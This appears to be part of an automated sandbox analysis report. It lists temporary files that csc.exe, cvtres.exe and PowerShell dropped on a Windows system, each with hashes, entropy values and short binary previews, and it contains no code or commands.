              Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...p.w.l.c.j.2.c.u...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...p.w.l.c.j.2.c.u...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

              C:\Users\user\AppData\Local\Temp\CSC2A73DB97C702412EB695E62356797BBE.TMP

              Download File
              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              File Type:MSVC .res
              Category:dropped
              Size (bytes):652
              Entropy (8bit):3.065477641564169
              Encrypted:false
              SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryGak7YnqqEPN5Dlq5J:+RI+ycuZhNIakSEPNnqX
              MD5:7A7A695ED9B4839CF4A95F6D7EA3380D
              SHA1:D95223A5C357BF8611ECD7F6A4EDD7B1FF4767A3
              SHA-256:6BEED4CF9406576376FFD6746AF150A7783C42B72F97D07E43FDE855B7F4682D
              SHA-512:BA89C4E14D245D287BB0D012E2F040FCDE510AEED49FAF2ADC1B11C135777575E965563FD7004B724CCB3B5585C7CF64DAB90605FAE1291AB14A111CE8080F24
              Malicious:false
              Reputation:unknown
              Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...t.p.t.0.a.0.u.l...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...t.p.t.0.a.0.u.l...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

              C:\Users\user\AppData\Local\Temp\CSC38F7C9333840429F8E926B6BB254946E.TMP

              Download File
              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              File Type:MSVC .res
              Category:dropped
              Size (bytes):652
              Entropy (8bit):3.0979995598369467
              Encrypted:false
              SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryVsak7YnqquhPN5Dlq5J:+RI+ycuZhNPsakSuhPNnqX
              MD5:BA6B36A22F29C8CC1CA62C3541556253
              SHA1:051A01AD9D1E2A9BCB749331D7BF5510E7B6DD69
              SHA-256:DB6F27C18ECAF0579F508CCDB669E2EBF9273EFC744B7F288C7838C46307C761
              SHA-512:1E56783DA07229E4B903549583FD2AB3ECE4996609A0EB561D66DA6F95172665AEB310A637AA663E7012520EB80F16D8EA02BFA957A4E449A6EABE5FD2DD68D7
              Malicious:false
              Reputation:unknown
              Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...u.g.g.3.o.5.n.f...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...u.g.g.3.o.5.n.f...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

              C:\Users\user\AppData\Local\Temp\CSC7E62D986CCD14293A1B1D71B70775B41.TMP

              Download File
              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              File Type:MSVC .res
              Category:dropped
              Size (bytes):652
              Entropy (8bit):3.0852621132113396
              Encrypted:false
              SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grycWJqak7Ynqq/WJbPN5Dlq5J:+RI+ycuZhNxqakSmbPNnqX
              MD5:0BE267FE339A54A24DAA9E65E6F95CB5
              SHA1:F0A26EBA80A57C9AE877DDA515CD8839AB248DBC
              SHA-256:E289D53A2DDEB704A64E7D836DECE0BE9D15DE35E995DF87B82C8B422E74D867
              SHA-512:E165B38330334FAF890C1F9987A26EA413FEABCC0E57D15168CAA56E4815875BCF5B43EAB46A849A9FC075D6D1C3206F3C16DE0EFAEC42A2BBC5F7BFE2BF75A2
              Malicious:false
              Reputation:unknown
              Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...0.h.s.i.h.c.h.1...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...0.h.s.i.h.c.h.1...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

              C:\Users\user\AppData\Local\Temp\CSC8BAF1FC523B466D86EA8211DF896A.TMP

              Download File
              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              File Type:MSVC .res
              Category:dropped
              Size (bytes):652
              Entropy (8bit):3.1190774050764096
              Encrypted:false
              SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryyrak7YnqqBEPN5Dlq5J:+RI+ycuZhN4rakSBEPNnqX
              MD5:5D1F8A6103781ABBC01C0A7CDBDB55F1
              SHA1:84D704124B90721B76E1CA4442A54BA949084DDA
              SHA-256:53D6E3E968DB598701D042DB4EA37861E7EC7E0C32F917418FD5722AEC09CDF7
              SHA-512:FC6C65655E99267E970B5BE32B0E268DA20FDF31864F381150797C00FBE046F3D7FCB553D5E3AC52E81753D63E1BC2C3B6EB1E3F00F592CF4EF05A36117813A6
              Malicious:false
              Reputation:unknown
              Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...o.y.q.1.c.2.c.j...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...o.y.q.1.c.2.c.j...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

              C:\Users\user\AppData\Local\Temp\CSCA98C8C663682422BB3F042EAAC3AA5FC.TMP

              Download File
              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              File Type:MSVC .res
              Category:dropped
              Size (bytes):652
              Entropy (8bit):3.1126231554769914
              Encrypted:false
              SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryTKCqak7Ynqq+KCbPN5Dlq5J:+RI+ycuZhNSakSaPNnqX
              MD5:2E143A93A2C9C276940D7D7645DC9F15
              SHA1:0C0C63550213FFFE37A2B30E44DF6E71B0776D92
              SHA-256:5F4FBDDD36C8511BADBD3355A57D1855779B37C310DAA69CE83F897C72D6BAFA
              SHA-512:324B9E4F2D55A95D7AF6FA31D5BCED3C92680AAB697D3A018045FE093810AFA8D8D8F124116EDA46256ECFD26247321C71CC8BD7D9FB20840E1FC8BFA1371FFC
              Malicious:false
              Reputation:unknown
              Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...s.j.f.y.4.3.1.f...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...s.j.f.y.4.3.1.f...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

              C:\Users\user\AppData\Local\Temp\CSCCBF2AAC487274BF4B5441EA2B445AE92.TMP

              Download File
              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              File Type:MSVC .res
              Category:dropped
              Size (bytes):652
              Entropy (8bit):3.078304088227274
              Encrypted:false
              SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grysIsqak7Ynqq1IsbPN5Dlq5J:+RI+ycuZhNaItakS1IiPNnqX
              MD5:B40A0EC8107302ECF30F3151B8248712
              SHA1:20BA5ECE74A719F1E7E8835CB603E02B2ABBAE2A
              SHA-256:900DA9E1423AC9AAF5311E7415F5F2E76882D12902B96606B3D80910D1E4A416
              SHA-512:30290195C78AD669DF473C11EB05E72F5148ABC3BBDEC17902D27016366927C44EAC5BD20E3058FD598FDD301EC69BCDD6F1EC4693C4C33C55F72844AD298D61
              Malicious:false
              Reputation:unknown
              Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...o.e.p.r.c.m.t.y...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...o.e.p.r.c.m.t.y...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

              C:\Users\user\AppData\Local\Temp\RES105D.tmp

              Download File
              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x482, 9 symbols
              Category:dropped
              Size (bytes):1320
              Entropy (8bit):3.973199456396972
              Encrypted:false
              SSDEEP:24:HMnW9rphlF1ahHBhKdNWI+ycuZhNIakSEPNnq9hgd:KWPIvKd41ulIa3Eq9y
              MD5:9042878F130635563C43742E2E83367F
              SHA1:680B4C0C9B34FEBB34312D5B1002FD0C84D0BB48
              SHA-256:5142B2B66B4FE66C0B8AA98FEE8E10FCD12B4F06D727A388BCC199CEC0BB2576
              SHA-512:4B2E3D70602A912EC959A384FBA9A51242697756B5BFDC3838F4309093892D2BDA3461E3A2551071F05BA99BEBF047A6F2FB522442126C9D218005E5BF353781
              Malicious:false
              Reputation:unknown
              Preview:L.....a.............debug$S........D...................@..B.rsrc$01........X.......(...........@..@.rsrc$02........P...2...............@..@........K....c:\Users\user\AppData\Local\Temp\CSC2A73DB97C702412EB695E62356797BBE.TMP................zzi^....._m~.8...........4.......C:\Users\user\AppData\Local\Temp\RES105D.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...t.p.t.0.a.0.u.l...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.

              C:\Users\user\AppData\Local\Temp\RES2E65.tmp

              Download File
              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x482, 9 symbols
              Category:dropped
              Size (bytes):1320
              Entropy (8bit):3.976565381157867
              Encrypted:false
              SSDEEP:24:H9MnW9r0QhHhhKdNWI+ycuZhNxqakSmbPNnq9hgd:YWZPKd41ulxqa3mRq9y
              MD5:BCA81E8793B496D3AD1690253CC3F263
              SHA1:3F66CAE801FB007C9D64D3C7FF6E9C4B1ECFF6F7
              SHA-256:A8C74C4C9F87B03A1E65BF219EDCB76F3D63A45733673BB4E402A1635A4F6BA5
              SHA-512:2827CA85F359F61008EEDD9EF6933CCCC2361E4244CF73F3BD9D383770E61C2F6AFC6DFBDC271631AA2B5A410C9460B24B5C202842090A6F35EDA541C0697EE1
              Malicious:false
              Reputation:unknown
              Preview:L.....a.............debug$S........D...................@..B.rsrc$01........X.......(...........@..@.rsrc$02........P...2...............@..@........K....c:\Users\user\AppData\Local\Temp\CSC7E62D986CCD14293A1B1D71B70775B41.TMP..................g.3.T.M..e..\...........4.......C:\Users\user\AppData\Local\Temp\RES2E65.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...0.h.s.i.h.c.h.1...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.

              C:\Users\user\AppData\Local\Temp\RES3848.tmp

              Download File
              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x482, 9 symbols
              Category:dropped
              Size (bytes):1320
              Entropy (8bit):3.9718406859930306
              Encrypted:false
              SSDEEP:24:H3nW9rUhHmhKdNWI+ycuZhNaItakS1IiPNnq9hgd:3Ww8Kd41ulaIta31Iuq9y
              MD5:4D52D282A050FBD77DCF3B62ADAEB815
              SHA1:E9464278394931D88B682821B00B7405A4D564AC
              SHA-256:2E65D5A8DE9DA248BE6DFB8F2B6C9C9F56D36F2A978D2DD41ACEE2DA516EE930
              SHA-512:565E965DA8543FE40E14064756D11CACBDB1557158FB8DDF0DCAA2E263C778C5B05CCFA91AFBEC8C00B53BC351BA9E04EAD53BB02B27C1B4E4A2499A84E2FCF2
              Malicious:false
              Reputation:unknown
              Preview:L.....a.............debug$S........D...................@..B.rsrc$01........X.......(...........@..@.rsrc$02........P...2...............@..@........K....c:\Users\user\AppData\Local\Temp\CSCCBF2AAC487274BF4B5441EA2B445AE92.TMP.....................s....1Q.$............4.......C:\Users\user\AppData\Local\Temp\RES3848.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...o.e.p.r.c.m.t.y...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.

              C:\Users\user\AppData\Local\Temp\RES4A3A.tmp

              Download File
              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x482, 9 symbols
              Category:dropped
              Size (bytes):0
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:24:HbnW9Q3oIhnhHkFhKdNWI+ycuZhNv6akSOLPNnq9hgd:T531hhEzKd41ulia3Gq9y
              MD5:4340D378D85430E4B567D8325AD7B630
              SHA1:8D4AF2B92289F05060A29A58A25FFF62497012F3
              SHA-256:5F1CAC6C4FDC193B24E2114A1E044B1F54763C8229AB5602533C6FF35AE64529
              SHA-512:C61D0B0E4236581D24BA90ECA016035395A6B1DE2CC7715153073314B49D8CB4B8BE47B2CAC38AE1042FD3A8E2C79A6346DC3D60C47F7C4DC5FB5323F2E174F7
              Malicious:false
              Reputation:unknown
              Preview:L.....a.............debug$S........D...................@..B.rsrc$01........X.......(...........@..@.rsrc$02........P...2...............@..@........J....c:\Users\user\AppData\Local\Temp\CSC176C1CB9788E4426ACAF7B271AB13B4.TMP.................M!...C..k...yD...........4.......C:\Users\user\AppData\Local\Temp\RES4A3A.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...p.q.v.o.g.m.w.c...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.

              C:\Users\user\AppData\Local\Temp\RESEA8.tmp

              Download File
              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x482, 9 symbols
              Category:dropped
              Size (bytes):1320
              Entropy (8bit):3.9791603240651487
              Encrypted:false
              SSDEEP:24:HZnW9rItH9hKdNwI+ycuZhNPsakSuhPNnq9hgd:NWItrKdm1ul0a3oq9y
              MD5:E94034754ED647F643858219D8BED106
              SHA1:8985855D9E535B81B954539017A71A324E40D93A
              SHA-256:7F2554CA86A1707C7AA12864CAA3A1F9FA2952E6AFD1E0D200DED06F2E3C0BDB
              SHA-512:77987F0F0617B8C1076B12B937476767771B0D4662FDA56F8744514056D7FEDCF9E8C970158A341E3272B8A6A3F7A8620B8B000E3BDAC1537411D413F8722C07
              Malicious:false
              Reputation:unknown
              Preview:L.....a.............debug$S........D...................@..B.rsrc$01........X.......(...........@..@.rsrc$02........P...2...............@..@........K....c:\Users\user\AppData\Local\Temp\CSC38F7C9333840429F8E926B6BB254946E.TMP.................k6./)....,5AUbS..........3.......C:\Users\user\AppData\Local\Temp\RESEA8.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...u.g.g.3.o.5.n.f...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.

              C:\Users\user\AppData\Local\Temp\RESEEEB.tmp

              Download File
              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x482, 9 symbols
              Category:dropped
              Size (bytes):1320
              Entropy (8bit):3.9847511803869358
              Encrypted:false
              SSDEEP:24:HunW9r9GjAOXhHlahKdNWI+ycuZhNSakSaPNnq9hgd:IW9dOx2Kd41ulSa3Wq9y
              MD5:08D2973E298791EDFC7E740782873E6A
              SHA1:23E6211CDBE8247EF38995D640CD31CD5DD094A1
              SHA-256:C6A673B3472B7AEBC8B20F68E87F09D7ABA4844971D6FD19C39D09B15D605813
              SHA-512:FA8FE70CE6DF4B1FC7B001865F9F6AEDB243F76570964D460195EB45D8F8F4B49763A3DC3CE1DBE26C80189F94DD35B2C8E46F720E2D45225F611A2798ED7721
              Malicious:false
              Reputation:unknown
              Preview:L.....a.............debug$S........D...................@..B.rsrc$01........X.......(...........@..@.rsrc$02........P...2...............@..@........K....c:\Users\user\AppData\Local\Temp\CSCA98C8C663682422BB3F042EAAC3AA5FC.TMP..................:....v..}vE............4.......C:\Users\user\AppData\Local\Temp\RESEEEB.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...s.j.f.y.4.3.1.f...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.

              C:\Users\user\AppData\Local\Temp\RESF563.tmp

              Download File
              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x47e, 9 symbols
              Category:dropped
              Size (bytes):1316
              Entropy (8bit):3.980956265605215
              Encrypted:false
              SSDEEP:24:HAS9QiguhHPhKdNWI+ycuZhN4rakSBEPNnq9Gd:6igSJKd41ulaa3Oq92
              MD5:74149A607262FF6591455E30A294647F
              SHA1:30E7ADE77B6A73462A9690E595416CAFB46A7669
              SHA-256:BC161911416B32D3461A2D6904832963F8145979C5BA98FFE74CCFCE821894B8
              SHA-512:332E78135DEA0B1EDFE714C094D635878B14C3999BFBD5C60E5CC9313459A1C31FE88F9EE6576A11670C43B1C2098BE6F8C525131D318BA00F700301C87F35EF
              Malicious:false
              Reputation:unknown
              Preview:L.....a~............debug$S........@...................@..B.rsrc$01........X.......$...........@..@.rsrc$02........P...................@..@........H....c:\Users\user\AppData\Local\Temp\CSC8BAF1FC523B466D86EA8211DF896A.TMP...............]..a.x.....|..U...........4.......C:\Users\user\AppData\Local\Temp\RESF563.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...o.y.q.1.c.2.c.j...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.

              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_02dez10h.oni.psm1

              Download File
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:very short file (no magic)
              Category:dropped
              Size (bytes):1
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:3:U:U
              MD5:C4CA4238A0B923820DCC509A6F75849B
              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
              Malicious:false
              Reputation:unknown
              Preview:1

              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5fuoontv.beq.ps1

              Download File
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:very short file (no magic)
              Category:dropped
              Size (bytes):1
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:3:U:U
              MD5:C4CA4238A0B923820DCC509A6F75849B
              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
              Malicious:false
              Reputation:unknown
              Preview:1

              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_npkgel2o.x34.ps1

              Download File
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:very short file (no magic)
              Category:dropped
              Size (bytes):1
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:3:U:U
              MD5:C4CA4238A0B923820DCC509A6F75849B
              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
              Malicious:false
              Reputation:unknown
              Preview:1

              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sb4tfs3y.gr4.psm1

              Download File
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:very short file (no magic)
              Category:dropped
              Size (bytes):1
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:3:U:U
              MD5:C4CA4238A0B923820DCC509A6F75849B
              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
              Malicious:false
              Reputation:unknown
              Preview:1

              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vpvcqr5c.u5n.ps1

              Download File
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:very short file (no magic)
              Category:dropped
              Size (bytes):1
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:3:U:U
              MD5:C4CA4238A0B923820DCC509A6F75849B
              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
